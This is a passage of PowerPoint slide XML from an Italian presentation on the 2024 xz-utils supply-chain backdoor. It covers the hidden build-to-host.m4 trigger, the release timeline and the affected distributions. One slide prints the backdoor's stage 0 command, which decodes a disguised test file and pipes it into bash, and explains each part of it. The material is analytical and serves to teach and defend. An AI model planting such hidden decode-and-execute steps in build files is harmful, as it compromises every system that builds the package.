                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). Tale file non è presente nella cartella m4 né in upstream né in downstream, ma è menzionato nel .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gitignore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di /m4.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Tale trigger è stato inserito nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> durante la creazione della Release.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Cosa eseguirà build-to-host.m4?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT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6656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51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Release e diffusione della backdoor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Eventi rilevanti nella diffusione verso le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>distro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> aventi 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integrazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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24 Febbraio 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils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b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.6.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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26 Febbraio 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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27 Febbraio 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan contatta Fedora per un update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su Fedora 40;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5 Marzo 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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9 Marzo 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils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b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.6.1 release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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25 Marzo 2024: Hans Jansen segnala bug a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e richiede update  a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.1;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27 Marzo 2024: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 5.6.1 su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="240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91433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52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Distribuzioni infette</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="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Dal report di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tenable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian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experimental</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unstable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, testing 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da 5.5.1alpha-0.1 a 5.6.1-1;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Fedora "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>development</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rawhide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 40beta, 41;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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSUSE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Tumbleweed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (update tra 7 Marzo e 28 Marzo);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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenSUSE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MicroOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (update tra 7 Marzo e 29 Marzo);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Kali Linux (tra 26 e 29 Marzo);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Arch Linux, solo alcuni artefatti (update medium, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> machine, container).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1050859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53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Installazione della Backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Il Package Manager della distribuzione (ad es. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>yum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>per Fedora) scarica la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di un package normalmente contiene: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Codice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-compilato;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File di configurazione e metadati;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Opzionalmente, scripts del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e triggers a supporto dell'installazione.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La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contiene il trigger nascosto m4/build-to-host.m4.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24062533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54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4445878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Installazione della Backdoor</a:t>
            </a:r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Estratto da infografica di Thomas Roccia.</a:t>
            </a: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Stage di installazione:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg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Stage 0: build-to-host.m4;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Stage 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hello World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Stage 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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1" name="Immagine 10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EC5E5C30-5C51-0CE0-68BD-6FE925C27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446" y="1457633"/>
            <a:ext cx="6929141" cy="52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05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55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7662"/>
            <a:ext cx="41840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Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10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EC5E5C30-5C51-0CE0-68BD-6FE925C27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446" y="1457633"/>
            <a:ext cx="6929141" cy="5270090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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825305B0-FE53-1D54-B865-9EA70AF2404B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672522" y="2178326"/>
            <a:ext cx="1258956" cy="4306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D96AF5D1-0417-F91E-19CC-99B46B23FA9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119218" y="1576456"/>
            <a:ext cx="463823" cy="16454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9841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56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9412"/>
            <a:ext cx="11853204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Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Scaricata la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sulla macchina, viene azionato m4/build-to-host.m4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questo script, modificato rispetto al modello di default, modifica il file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>builddir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> perché termini eseguendo questi punti:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Legge /test/files/bad-3-corrupt_lzma2.xz ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Effettua una sostituzione di caratteri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Esegue il file Bash risultante.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Semplificando, le istruzioni aggiunte corrispondono alla seguente riga di comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat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 ./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tests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/files/bad-3-corrupt_lzma2.xz | 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tr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 "\t \-_" " \t_\-" | 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 –d | /bin/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bash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 &gt;/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 2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2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945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57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6415"/>
            <a:ext cx="11853204" cy="56015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Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat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 ./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tests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/files/bad-3-corrupt_lzma2.xz | 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tr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 "\t \-_" " \t_\-" | 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 –d | /bin/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bash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 &gt;/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 2&gt;&amp;1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scrive in output tutti gli stream del file;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Il comando pipe, "|", trasforma l'output del comando a sinistra nell'input del comando a destra.</a:t>
            </a:r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i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sostituisce ogni elemento dell'input secondo una relazione d'ordine stabilita dalle due righe successive: "\t" con " ", " " con "\t", "\-" con "_", "_" con "\-";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  -d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> esegue una decompressione dell'input (che è in formato .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> esegue il codice Bash dato in input.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"&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
